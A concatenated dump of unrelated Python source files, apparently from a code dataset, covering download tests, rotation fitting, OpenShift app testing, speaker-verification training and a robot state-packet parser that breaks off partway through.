client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-extension")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_name():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-name")
assert os.path.basename(data.name) == "download.png"
assert data.read() == b"<somedata>"
def test_unique_filename(tmpdir):
client = Client(
schema, session=TestClient(app), decoders=[decoders.DownloadDecoder(tmpdir)]
)
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
data = client.request("file-response")
assert os.path.basename(data.name) == "filename (1).png"
assert data.read() == b"<somedata>"
|
29891
|
import numpy as np
import math
from scipy.optimize import minimize
class Optimize():
def __init__(self):
self.c_rad2deg = 180.0 / np.pi
self.c_deg2rad = np.pi / 180.0
def isRotationMatrix(self, R) :
Rt = np.transpose(R)
shouldBeIdentity = np.dot(Rt, R)
I = np.identity(3, dtype = R.dtype)
n = np.linalg.norm(I - shouldBeIdentity)
# print('n: ' + str(n))
return n < 1e-6
def Rot_Matrix_2_Euler_Angles(self, R):
assert(self.isRotationMatrix(R))
pitch = -math.asin(R[1, 2])
roll = -math.atan2(R[1, 0], R[1, 1])
yaw = -math.atan2(R[0, 2], R[2, 2])
return np.array([roll, pitch, yaw])
def Get_Init_Guess(self, l_vec, b_vec, f_vec):
f_vec = np.cross(b_vec, l_vec)
l_vec = np.cross(f_vec, b_vec)
l_norm = np.linalg.norm(l_vec)
l_vec /= l_norm
b_norm = np.linalg.norm(b_vec)
b_vec /= b_norm
f_norm = np.linalg.norm(f_vec)
f_vec /= f_norm
l_vec = l_vec.reshape(3, 1)
b_vec = b_vec.reshape(3, 1)
f_vec = f_vec.reshape(3, 1)
l = np.array([1, 0, 0]).reshape(1, 3)
b = np.array([0, 1, 0]).reshape(1, 3)
f = np.array([0, 0, 1]).reshape(1, 3)
R = l_vec @ l + b_vec @ b + f_vec @ f
assert (R.shape == (3, 3))
roll, pitch, yaw = self.Rot_Matrix_2_Euler_Angles(R)
return np.array([roll, pitch, yaw])
def Euler_Angles_2_Vectors(self, rx, ry, rz):
'''
rx: pitch
ry: yaw
rz: roll
'''
ry *= -1
rz *= -1
R_x = np.array([[1.0, 0.0, 0.0],
[0.0, np.cos(rx), -np.sin(rx)],
[0.0, np.sin(rx), np.cos(rx)]])
R_y = np.array([[np.cos(ry), 0.0, np.sin(ry)],
[0.0, 1.0, 0.0],
[-np.sin(ry), 0.0, np.cos(ry)]])
R_z = np.array([[np.cos(rz), -np.sin(rz), 0.0],
[np.sin(rz), np.cos(rz), 0.0],
[0.0, 0.0, 1.0]])
R = R_y @ R_x @ R_z
l_vec = R @ np.array([1, 0, 0])
b_vec = R @ np.array([0, 1, 0])
f_vec = R @ np.array([0, 0, 1])
return np.array([l_vec, b_vec, f_vec])
def Objective(self, x, l_vec, b_vec, f_vec):
rx = x[0]
ry = x[1]
rz = x[2]
l_hat, b_hat, f_hat = self.Euler_Angles_2_Vectors(rx, ry, rz)
l_vec_dot = np.clip(l_hat[0] * l_vec[0] + l_hat[1] * l_vec[1] + l_hat[2] * l_vec[2], -1, 1)
b_vec_dot = np.clip(b_hat[0] * b_vec[0] + b_hat[1] * b_vec[1] + b_hat[2] * b_vec[2], -1, 1)
f_vec_dot = np.clip(f_hat[0] * f_vec[0] + f_hat[1] * f_vec[1] + f_hat[2] * f_vec[2], -1, 1)
return math.acos(l_vec_dot) ** 2 + math.acos(b_vec_dot) ** 2 + math.acos(f_vec_dot) ** 2
def Get_Ortho_Vectors(self, l_vec, b_vec, f_vec):
x0 = self.Get_Init_Guess(l_vec, b_vec, f_vec)
sol = minimize(self.Objective, x0, args=(l_vec, b_vec, f_vec), method='nelder-mead', options={'xatol': 1e-7, 'disp': False})
pitch_rad, yaw_rad, roll_rad = sol.x
v1, v2, v3 = self.Euler_Angles_2_Vectors(pitch_rad, yaw_rad, roll_rad)
return np.array([v1, v2, v3])
|
29898
|
from django.apps import AppConfig
class AldrynSearchConfig(AppConfig):
name = 'aldryn_search'
def ready(self):
from . import conf # noqa
|
29941
|
class Solution:
def getFormattedEMail(self, email):
userName, domain = email.split('@')
if '+' in userName:
userName = userName.split('+')[0]
if '.' in userName:
userName = ''.join(userName.split('.'))
return userName + '@' + domain
def numUniqueEmails(self, emails: List[str]) -> int:
emailsSet = set()
for email in emails:
emailsSet.add(self.getFormattedEMail(email))
return len(emailsSet)
|
29945
|
class SendResult:
def __init__(self, result={}):
self.successful = result.get('code', None) == '200'
self.message_id = result.get('message_id', None)
|
29948
|
from .GlobalData import global_data
from .utils.oc import oc
import requests
import time
import logging
class App:
def __init__(self, deployment, project, template, build_config,route=""):
self.project = project
self.template = template
self.deployment = deployment
self.build_config = build_config
self.route = route
self.logger = logging.getLogger('reliability')
def build(self, kubeconfig):
(result, rc) = oc("start-build -n " + self.project + " " + self.build_config, kubeconfig)
if rc != 0:
self.logger.error("build_app: Failed to create app " + self.deployment + " in project " + self.project)
return "App build failed for build config : " + self.build_config
else:
with global_data.builds_lock:
global_data.total_build_count += 1
return "App build succeeded for build config : " + self.build_config
def visit(self):
visit_success = False
try:
r = requests.get("http://" + self.route + "/")
self.logger.info(str(r.status_code) + ": visit: " + self.route)
if r.status_code == 200:
visit_success = True
except Exception as e :
self.logger.error(f"visit: {self.route} Exception {e}")
return visit_success
def scale_up(self, kubeconfig):
(result, rc) = oc("scale --replicas=2 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_up: Failed to scale up " + self.project + "." + self.deployment)
return "App scale up failed for deployment : " + self.deployment
else:
return "App scale up succeeded for deployment : " + self.deployment
def scale_down(self, kubeconfig):
(result, rc) = oc("scale --replicas=1 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_down: Failed to scale down " + self.project + "." + self.deployment)
return "App scale down failed for deployment : " + self.deployment
else:
return "App scale down succeeded for deployment : " + self.deployment
class Apps:
def __init__(self):
self.failed_apps = 0
self.apps = {}
self.logger = logging.getLogger('reliability')
def add(self, app, kubeconfig):
(result, rc) = oc("new-app -n " + app.project + " --template " + app.template, kubeconfig)
if rc != 0:
self.logger.error("create_app: Failed to create app " + app.deployment + " in project " + app.project)
return None
else:
self.apps[app.project + "." + app.deployment] = app
(route,rc) = oc("get route --no-headers -n " + app.project + " | awk {'print $2'} | grep " + app.template, kubeconfig)
if rc == 0:
app.route = route.rstrip()
max_tries = 60
current_tries = 0
visit_success = False
while not visit_success and current_tries <= max_tries:
self.logger.info(app.template + " route not available yet, sleeping 10 seconds")
time.sleep(10)
current_tries += 1
visit_success = app.visit()
if not visit_success:
self.failed_apps += 1
self.logger.error("add_app: " + app.project + "." + app.deployment + " did not become available" )
return app
# removing an app just removes the dictionary entry, actual app removed by project deletion
def remove(self,app):
self.apps.pop(app.project + "." + app.deployment)
def simulate(self):
apps = {}
app1 = App('cakephp-mysql-example','cakephp-mysql-example-0','cakephp-mysql-example','cakephp-mysql-example')
self.apps[app1.project + "." + app1.deployment] = app1
# app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example')
# self.apps[app2.project + "." + app2.deployment] = app2
def init(self):
pass
all_apps=Apps()
if __name__ == "__main__":
app = App("cakephp-mysql-example", "t1", "cakephp-mysql-example","cakephp-mysql-example")
apps = Apps()
# apps.add(app)
# time.sleep(180)
app.visit()
app.scale_up()
time.sleep(30)
app.scale_down()
app.build()
|
29963
|
import requests_cache
import os.path
import tempfile
try:
from requests_cache import remove_expired_responses
except ModuleNotFoundError:
from requests_cache.core import remove_expired_responses
def caching(
cache=False,
name=None,
backend="sqlite",
expire_after=86400,
allowable_codes=(200,),
allowable_methods=("GET",),
):
"""
pygbif caching management
:param cache: [bool] if ``True`` all http requests are cached. if ``False`` (default),
no http requests are cached.
:param name: [str] the cache name. when backend=sqlite, this is the path for the
sqlite file, ignored if sqlite not used. if not set, the file is put in your
temporary directory, and therefore is cleaned up/deleted after closing your
python session
:param backend: [str] the backend, one of:
- ``sqlite`` sqlite database (default)
- ``memory`` not persistent, stores all data in Python dict in memory
- ``mongodb`` (experimental) MongoDB database (pymongo < 3.0 required)
- ``redis`` stores all data on a redis data store (redis required)
:param expire_after: [str] timedelta or number of seconds after cache will be expired
or None (default) to ignore expiration. default: 86400 seconds (24 hrs)
:param allowable_codes: [tuple] limit caching only for response with this codes
(default: 200)
:param allowable_methods: [tuple] cache only requests of this methods
(default: ‘GET’)
:return: sets options to be used by pygbif, returns the options you selected
in a hash
Note: setting cache=False will turn off caching, but the backend data still
persists. thus, you can turn caching back on without losing your cache.
this also means if you want to delete your cache you have to do it yourself.
Note: on loading pygbif, we clean up expired responses
Usage::
import pygbif
# caching is off by default
from pygbif import occurrences
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# turn caching on
pygbif.caching(True)
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# set a different backend
pygbif.caching(cache=True, backend="redis")
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# set a different backend
pygbif.caching(cache=True, backend="mongodb")
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# set path to a sqlite file
pygbif.caching(name = "some/path/my_file")
"""
default_name = "pygbif_requests_cache"
if not cache:
requests_cache.uninstall_cache()
CACHE_NAME = None
else:
if name is None and backend == "sqlite":
CACHE_NAME = os.path.join(tempfile.gettempdir(), default_name)
else:
CACHE_NAME = default_name
requests_cache.install_cache(
cache_name=CACHE_NAME, backend=backend, expire_after=expire_after
)
remove_expired_responses()
cache_settings = {
"cache": cache,
"name": CACHE_NAME,
"backend": backend,
"expire_after": expire_after,
"allowable_codes": allowable_codes,
"allowable_methods": allowable_methods,
}
return cache_settings
|
29965
|
import os, sys
exp_id=[
"exp1.0",
]
env_source=[
"file",
]
exp_mode = [
"continuous",
#"newb",
#"base",
]
num_theories_init=[
4,
]
pred_nets_neurons=[
8,
]
pred_nets_activation=[
"linear",
# "leakyRelu",
]
domain_net_neurons=[
8,
]
domain_pred_mode=[
"onehot",
]
mse_amp=[
1e-7,
]
simplify_criteria=[
'\("DLs",0,3,"relative"\)',
]
scheduler_settings=[
'\("ReduceLROnPlateau",40,0.1\)',
]
optim_type=[
'\("adam",5e-3\)',
]
optim_domain_type=[
'\("adam",1e-3\)',
]
reg_amp=[
1e-8,
]
reg_domain_amp = [
1e-5,
]
batch_size = [
2000,
]
loss_core = [
"DLs",
]
loss_order = [
-1,
]
loss_decay_scale = [
"None",
]
is_mse_decay = [
False,
]
loss_balance_model_influence = [
False,
]
num_examples = [
20000,
]
iter_to_saturation = [
5000,
]
MDL_mode = [
"both",
]
num_output_dims = [
2,
]
num_layers = [
3,
]
is_pendulum = [
False,
]
date_time = [
"10-9",
]
seed = [
0,
30,
60,
90,
120,
150,
180,
210,
240,
270,
]
def assign_array_id(array_id, param_list):
if len(param_list) == 0:
print("redundancy: {0}".format(array_id))
return []
else:
param_bottom = param_list[-1]
length = len(param_bottom)
current_param = param_bottom[array_id % length]
return assign_array_id(int(array_id / length), param_list[:-1]) + [current_param]
array_id = int(sys.argv[1])
param_list = [exp_id,
env_source,
exp_mode,
num_theories_init,
pred_nets_neurons,
pred_nets_activation,
domain_net_neurons,
domain_pred_mode,
mse_amp,
simplify_criteria,
scheduler_settings,
optim_type,
optim_domain_type,
reg_amp,
reg_domain_amp,
batch_size,
loss_core,
loss_order,
loss_decay_scale,
is_mse_decay,
loss_balance_model_influence,
num_examples,
iter_to_saturation,
MDL_mode,
num_output_dims,
num_layers,
is_pendulum,
date_time,
seed,
]
param_chosen = assign_array_id(array_id, param_list)
exec_str = "python ../theory_learning/theory_exp.py"
for param in param_chosen:
exec_str += " {0}".format(param)
exec_str += " {0}".format(array_id)
print(param_chosen)
print(exec_str)
from shutil import copyfile
current_PATH = os.path.dirname(os.path.realpath(__file__))
def make_dir(filename):
import os
import errno
if not os.path.exists(os.path.dirname(filename)):
print("directory {0} does not exist, created.".format(os.path.dirname(filename)))
try:
os.makedirs(os.path.dirname(filename))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
print(exc)
raise
filename = "../data/" + "{0}_{1}/".format(param_chosen[0], param_chosen[-2])
make_dir(filename)
fc = "run_theory.py"
if not os.path.isfile(filename + fc):
copyfile(current_PATH + "/" + fc, filename + fc)
os.system(exec_str)
|
29991
|
import sys
if len(sys.argv) != 4 :
print 'usage:', sys.argv[0], 'index_fn id_mapping_fn output_fn'
exit(9)
a = open(sys.argv[1])
a.readline()
header = a.readline()
dir = a.readline()
#build map: filename -> set of bad samples
mp = {}
mp_good = {}
mp_bad = {}
for line in a :
t = line.split()
mp[t[0]] = set()
mp_good[t[0]] = t[1]
mp_bad[t[0]] = t[2]
for id in t[3:] :
mp[t[0]].add(id)
a.close()
out = open(sys.argv[3], 'w')
out.write('CONDUIT_HDF5_INCLUSION\n')
out.write(header)
out.write(dir)
a = open(sys.argv[2])
bad = 0
for line in a :
t = line.split()
fn = t[0]
out.write(fn + ' ' + mp_good[fn] + ' ' + mp_bad[fn] + ' ')
for id in t[1:] :
if id not in mp[fn] :
out.write(id + ' ')
else :
bad += 1
out.write('\n')
out.close()
print header
print 'num found bad:', bad
|
29994
|
import tensorflow as tf
import numpy as np
import os
import time
from utils import random_batch, normalize, similarity, loss_cal, optim
from configuration import get_config
from tensorflow.contrib import rnn
config = get_config()
def train(path):
tf.reset_default_graph() # reset graph
# draw graph
batch = tf.placeholder(shape= [None, config.N*config.M, 40], dtype=tf.float32) # input batch (time x batch x n_mel)
lr = tf.placeholder(dtype= tf.float32) # learning rate
global_step = tf.Variable(0, name='global_step', trainable=False)
w = tf.get_variable("w", initializer= np.array([10], dtype=np.float32))
b = tf.get_variable("b", initializer= np.array([-5], dtype=np.float32))
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # define lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
embedded = outputs[-1] # the last ouput is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# loss
sim_matrix = similarity(embedded, w, b)
print("similarity matrix size: ", sim_matrix.shape)
loss = loss_cal(sim_matrix, type=config.loss)
# optimizer operation
trainable_vars= tf.trainable_variables() # get variable list
optimizer= optim(lr) # get optimizer (type is determined by configuration)
grads, vars= zip(*optimizer.compute_gradients(loss)) # compute gradients of variables with respect to loss
grads_clip, _ = tf.clip_by_global_norm(grads, 3.0) # l2 norm clipping by 3
grads_rescale= [0.01*grad for grad in grads_clip[:2]] + grads_clip[2:] # smaller gradient scale for w, b
train_op= optimizer.apply_gradients(zip(grads_rescale, vars), global_step= global_step) # gradient update operation
# check variables memory
variable_count = np.sum(np.array([np.prod(np.array(v.get_shape().as_list())) for v in trainable_vars]))
print("total variables :", variable_count)
# record loss
loss_summary = tf.summary.scalar("loss", loss)
merged = tf.summary.merge_all()
saver = tf.train.Saver()
# training session
with tf.Session() as sess:
tf.global_variables_initializer().run()
os.makedirs(os.path.join(path, "Check_Point"), exist_ok=True) # make folder to save model
os.makedirs(os.path.join(path, "logs"), exist_ok=True) # make folder to save log
writer = tf.summary.FileWriter(os.path.join(path, "logs"), sess.graph)
epoch = 0
lr_factor = 1 # lr decay factor ( 1/2 per 10000 iteration)
loss_acc = 0 # accumulated loss ( for running average of loss)
for iter in range(config.iteration):
# run forward and backward propagation and update parameters
_, loss_cur, summary = sess.run([train_op, loss, merged],
feed_dict={batch: random_batch(), lr: config.lr*lr_factor})
loss_acc += loss_cur # accumulated loss for each 100 iteration
if iter % 10 == 0:
writer.add_summary(summary, iter) # write at tensorboard
if (iter+1) % 100 == 0:
print("(iter : %d) loss: %.4f" % ((iter+1),loss_acc/100))
loss_acc = 0 # reset accumulated loss
if (iter+1) % 10000 == 0:
lr_factor /= 2 # lr decay
print("learning rate is decayed! current lr : ", config.lr*lr_factor)
if (iter+1) % 10000 == 0:
saver.save(sess, os.path.join(path, "./Check_Point/model.ckpt"), global_step=iter//10000)
print("model is saved!")
# Test Session
def test(path):
tf.reset_default_graph()
# draw graph
enroll = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # enrollment batch (time x batch x n_mel)
verif = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # verification batch (time x batch x n_mel)
batch = tf.concat([enroll, verif], axis=1)
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # make lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
embedded = outputs[-1] # the last ouput is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# enrollment embedded vectors (speaker model)
enroll_embed = normalize(tf.reduce_mean(tf.reshape(embedded[:config.N*config.M, :], shape= [config.N, config.M, -1]), axis=1))
# verification embedded vectors
verif_embed = embedded[config.N*config.M:, :]
similarity_matrix = similarity(embedded=verif_embed, w=1., b=0., center=enroll_embed)
saver = tf.train.Saver(var_list=tf.global_variables())
with tf.Session() as sess:
tf.global_variables_initializer().run()
# load model
print("model path :", path)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path, "Check_Point"))
ckpt_list = ckpt.all_model_checkpoint_paths
loaded = 0
for model in ckpt_list:
if config.model_num == int(model.split('-')[-1]): # find ckpt file which matches configuration model number
print("ckpt file is loaded !", model)
loaded = 1
saver.restore(sess, model) # restore variables from selected ckpt file
break
if loaded == 0:
raise AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.")
print("test file path : ", config.test_path)
# return similarity matrix after enrollment and verification
time1 = time.time() # for check inference time
if config.tdsv:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False, noise_filenum=1),
verif:random_batch(shuffle=False, noise_filenum=2)})
else:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False),
verif:random_batch(shuffle=False, utter_start=config.M)})
S = S.reshape([config.N, config.M, -1])
time2 = time.time()
np.set_printoptions(precision=2)
print("inference time for %d utterences : %0.2fs"%(2*config.M*config.N, time2-time1))
print(S) # print similarity matrix
# calculating EER
diff = 1; EER=0; EER_thres = 0; EER_FAR=0; EER_FRR=0
# through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR)
for thres in [0.01*i+0.5 for i in range(50)]:
S_thres = S>thres
# False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification speaker)
FAR = sum([np.sum(S_thres[i])-np.sum(S_thres[i,:,i]) for i in range(config.N)])/(config.N-1)/config.M/config.N
# False reject ratio = false reject / matched population (enroll speaker = verification speaker)
FRR = sum([config.M-np.sum(S_thres[i][:,i]) for i in range(config.N)])/config.M/config.N
# Save threshold when FAR = FRR (=EER)
if diff> abs(FAR-FRR):
diff = abs(FAR-FRR)
EER = (FAR+FRR)/2
EER_thres = thres
EER_FAR = FAR
EER_FRR = FRR
print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER,EER_thres,EER_FAR,EER_FRR))
|
30036
|
from collections import OrderedDict
import numpy as np
from pandas import DataFrame
from sv import SVData, CorTiming
def loadSVDataFromBUGSDataset(filepath, logreturnforward, logreturnscale, dtfilepath=None):
dts = None
if dtfilepath is not None:
with open(dtfilepath) as f:
content = f.readlines()
dts = np.array([float(x) for x in content[1:-1]])
with open(filepath) as f:
content = f.readlines()
logreturns = np.array([float(x) for x in content[1:-1]])
times = range(len(logreturns))
if dts is not None:
svdf = DataFrame(OrderedDict((('logreturn', logreturns), ('dt', dts))), index=times)
else:
svdf = DataFrame(OrderedDict((('logreturn', logreturns),)), index=times)
return SVData(
sourcekind='loader',
source=loadSVDataFromBUGSDataset,
svdf=svdf,
params=None,
cortiming=CorTiming.unknown,
logreturnforward=logreturnforward,
logreturnscale=logreturnscale)
|
30042
|
from __future__ import print_function
import struct
import copy
#this class handles different protocol versions
class RobotStateRT(object):
@staticmethod
def unpack(buf):
rs = RobotStateRT()
(plen, ptype) = struct.unpack_from("!IB", buf)
if plen == 756:
return RobotStateRT_V15.unpack(buf)
elif plen == 812:
return RobotStateRT_V18.unpack(buf)
elif plen == 1044:
return RobotStateRT_V30.unpack(buf)
else:
print("RobotStateRT has wrong length: " + str(plen))
return rs
#this parses RobotStateRT for versions = v1.5
#http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd
class RobotStateRT_V15(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V15()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
###
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
return rs
#this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8)
class RobotStateRT_V18(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V18()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_mode: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
return rs
#this parses RobotStateRT for versions >=3.0 (i.e. 3.0)
class RobotStateRT_V30(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'i_control',
'tool_vector_actual', 'tcp_speed_actual', 'tcp_force',
'tool_vector_target', 'tcp_speed_target',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes', 'safety_mode',
#6xd: unused
'tool_acc_values',
#6xd: unused
'speed_scaling', 'linear_momentum_norm',
#2xd: unused
'v_main', 'v_robot', 'i_robot', 'v_actual']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V30()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
